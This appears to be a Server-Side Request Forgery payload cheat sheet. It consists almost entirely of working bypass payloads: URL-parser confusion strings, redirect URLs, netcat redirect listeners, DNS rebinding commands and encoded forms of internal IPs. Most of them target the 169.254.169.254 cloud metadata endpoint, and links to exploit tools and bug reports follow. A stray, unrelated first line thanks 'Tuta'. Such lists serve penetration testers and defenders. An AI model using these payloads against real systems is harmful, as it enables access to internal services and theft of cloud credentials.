I'm grateful for the support received by Tuta
http://google.com:80+&@127.88.23.245:22/#[email protected]:80/
http://127.88.23.245:22/+&@google.com:80#[email protected]:80/
http://google.com:80+&@google.com:80#[email protected]:22/
http://127.88.23.245:22/[email protected]:80/
http://127.88.23.245:22/#@www.google.com:80/
http://google.com:80\\@127.88.23.245:22/
Status codes: 300, 301, 302, 303, 305, 307, 308
Filetypes: jpg, json, csv, xml, pdf
jpg 301 response without and with a valid response body:
https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-.i.jpg
https://ssrf.localdomain.pw/img-without-body-md/301-http-.i.jpg
https://ssrf.localdomain.pw/img-with-body/301-http-169.254.169.254:80-.i.jpg
https://ssrf.localdomain.pw/img-with-body-md/301-http-.i.jpg
json 301 response without and with a valid response body:
https://ssrf.localdomain.pw/json-without-body/301-http-169.254.169.254:80-.j.json
https://ssrf.localdomain.pw/json-without-body-md/301-http-.j.json
https://ssrf.localdomain.pw/json-with-body/301-http-169.254.169.254:80-.j.json
https://ssrf.localdomain.pw/json-with-body-md/301-http-.j.json
csv 301 response without and with a valid response body:
https://ssrf.localdomain.pw/csv-without-body/301-http-169.254.169.254:80-.c.csv
https://ssrf.localdomain.pw/csv-without-body-md/301-http-.c.csv
https://ssrf.localdomain.pw/csv-with-body/301-http-169.254.169.254:80-.c.csv
https://ssrf.localdomain.pw/csv-with-body-md/301-http-.c.csv
xml 301 response without and with a valid response body:
https://ssrf.localdomain.pw/xml-without-body/301-http-169.254.169.254:80-.x.xml
https://ssrf.localdomain.pw/xml-without-body-md/301-http-.x.xml
https://ssrf.localdomain.pw/xml-with-body/301-http-169.254.169.254:80-.x.xml
https://ssrf.localdomain.pw/xml-with-body-md/301-http-.x.xml
pdf 301 response without and with a valid response body:
https://ssrf.localdomain.pw/pdf-without-body/301-http-169.254.169.254:80-.p.pdf
https://ssrf.localdomain.pw/pdf-without-body-md/301-http-.p.pdf
https://ssrf.localdomain.pw/pdf-with-body/301-http-169.254.169.254:80-.p.pdf
https://ssrf.localdomain.pw/pdf-with-body-md/301-http-.p.pdf
https://ssrf.localdomain.pw/custom-30x/?code=332&url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
https://ssrf.localdomain.pw/custom-200/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
https://ssrf.localdomain.pw/custom-201/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
while true ; do nc -l -p 80 -c 'echo -e "HTTP/1.1 302 Found\nContent-Type: application/json\nLocation: http://169.254.169.254/\n{\"a\":\"b\"}"'; done
export RTSPLOCATION="http://169.254.169.254/"; while true ; do nc -l -p 554 -c 'echo -e "RTSP/1.0 301 Moved\nCSeq: 1\nLocation: $RTSPLOCATION"'; done
python ip.py IP PORT WhiteListedDomain EXPORT(optional)
python ip.py 169.254.169.254 80 www.google.com
python ip.py 169.254.169.254 80 www.google.com export
nslookup ssrf-169.254.169.254.localdomain.pw
nslookup ssrf-cloud.localdomain.pw
nslookup 169.254.169.254.xip.io
nslookup 1ynrnhl.xip.io
nslookup www.owasp.org.1ynrnhl.xip.io
nslookup 127.127.127.127.xip.io
nslookup 169.254.169.254.nip.io
nslookup app-169-254-169-254.nip.io
nslookup owasp.org.169.254.169.254.nip.io
nslookup customer2-app-169-254-169-254.nip.io
nslookup 127.127.127.127.nip.io
nslookup ssrf-race-169.254.169.254.localdomain.pw
pip install twised
python3 dns.py WhitelistedIP InternalIP ServerIP Port Domain
python3 dns.py 216.58.214.206 169.254.169.254 78.47.24.216 53 localdomains.pw
DNS Rebinding Exploitation Framework - https://github.com/mwrlabs/dref
https://hackerone.com/reports/237381
https://hackerone.com/reports/243470
https://github.com/neex/ffmpeg-avi-m3u-xbin
http://ssrf.localdomain.pw/iframe/?proto=http&ip=127.0.0.1&port=80&url=/
http://169。254。169。254/
http://169。254。169。254/
http://⑯⑨。②⑤④。⑯⑨。②⑤④/
http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
http://②⑧⑤②⓪③⑨①⑥⑥:80/
http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
http://⓪⓪②⑤①。⓪⓪⓪③⑦⑥。⓪⓪⓪⓪②⑤①。⓪⓪⓪⓪⓪③⑦⑥:80/
http://[::①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/
http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/
http://⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80/
http://⓪ⓧⓐ⑨。⑯⑥⑧⑨⑥⑥②:80/
http://⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80/
http://⓪⓪②⑤①。⓪ⓧⓕⓔ。④③⑤①⑧:80/
https://github.com/irsdl/OutlookLeakTest/blob/master/Schemes-List.xlsx?raw=true
https://github.com/ecbftw/poc/blob/master/java-python-ftp-injection/ftp-injection-server.py
https://webcache.googleusercontent.com/search?q=cache:http://antirez.com/news/96
https://www.youtube.com/watch?v=qGpAJxfADjo
https://github.com/jmdx/TLS-poison
https://www.youtube.com/watch?v=8t5-A4ASTIU
https://www.youtube.com/watch?v=D1S-G8rJrEk
https://github.com/orangetw/Tiny-URL-Fuzzer
https://edoverflow.com/2017/ruby-resolv-bug/
https://hackerone.com/reports/287245
https://hackerone.com/reports/215105
0177.1 => 127.0.0.1
0x7f.1 => 127.0.0.1
127.1 => 127.0.0.1
http://instance-data/latest/meta-data/
http://webcache.googleusercontent.com/search?q=cache:http://blog.safebuff.com/2016/07/03/SSRF-Tips/
https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51
https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM
https://github.com/bcoles/ssrf_proxy
SSRF Proxy facilitates tunneling HTTP communications through servers vulnerable to Server-Side Request Forgery
https://www.rfk.id.au/blog/entry/security-bugs-ssrf-via-request-splitting/
https://www.nginx.com/blog/trust-no-one-perils-of-trusting-user-input/
curl http://remote-ip-address/latest/meta-data/ -H "Host: 169.154.169.254"
https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/
https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/